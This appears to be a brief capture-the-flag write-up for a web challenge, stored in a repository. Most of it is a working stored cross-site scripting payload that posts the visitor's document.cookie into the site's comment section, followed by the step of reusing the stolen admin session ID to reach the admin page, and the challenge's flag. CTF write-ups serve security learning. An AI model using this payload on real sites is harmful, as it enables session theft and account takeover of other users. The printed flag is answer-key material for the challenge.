blob: 51747c8cbea6dd777b608f1ab94f4419d1da8cf9 (
plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
|
The comment field is vulnerable to injection, so we just inject a script that makes a comment with the document.cookie variable.
```
<script>
let data = new URLSearchParams();
data.append('name', 'Cookies');
data.append('comment', document.cookie);
fetch('/new-comment', {
method: 'POST',
headers: { "Content-Type": "application/x-www-form-urlencoded" },
body: data,
});
</script>
```
Then we set our session ID to the admin's, and go to the admin page. `punk_{QRPMGW20G1XF20IH}`
|